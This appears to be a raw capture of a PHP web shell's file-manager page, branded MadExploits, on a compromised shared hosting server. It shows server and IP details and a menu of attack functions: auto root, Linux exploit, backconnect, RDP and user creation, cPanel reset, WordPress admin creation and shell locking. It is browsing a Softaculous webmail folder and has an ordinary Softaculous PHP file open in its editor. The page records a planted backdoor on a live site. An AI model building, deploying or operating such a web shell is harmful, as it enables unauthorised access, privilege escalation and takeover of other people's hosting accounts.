Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 52.15.72.229
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
webmail /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Core.config.json
4.06
KB
-rw-r--r--
_edit.php
3.58
KB
-rw-r--r--
_edit.xml
433
B
-rw-r--r--
_extend.php
1.51
KB
-rw-r--r--
changelog.txt
2.26
KB
-rw-r--r--
clone.php
4.99
KB
-rw-r--r--
config.json
6.91
KB
-rw-r--r--
db_init.php
619
B
-rw-r--r--
encryption_key.php
8
B
-rw-r--r--
fileindex.php
188
B
-rw-r--r--
import.php
3.84
KB
-rw-r--r--
info.xml
3.88
KB
-rw-r--r--
install.js
1.29
KB
-rw-r--r--
install.php
5.87
KB
-rw-r--r--
install.xml
3.58
KB
-rw-r--r--
md5
3.89
KB
-rw-r--r--
migrate.php
1.28
KB
-rw-r--r--
notes.txt
1.46
KB
-rw-r--r--
upgrade.php
5.75
KB
-rw-r--r--
upgrade.xml
627
B
-rw-r--r--
webmail.sql
41.99
KB
-rw-r--r--
webmail.zip
66.63
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _extend.php
<?php ////////////////////////////////////////////////////////////// //=========================================================== // extend.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __softname_funcname() ///////////////////////////////////////// ////////////////////////////////////////// // Note : The path of the upgrade package // is $software['path'].'/' . So to // access other files use // $software['path'].'/other_file.ext' ////////////////////////////////////////// //Change password using old method function __ad_pass_md5($password){ return md5($password); } ?>
Close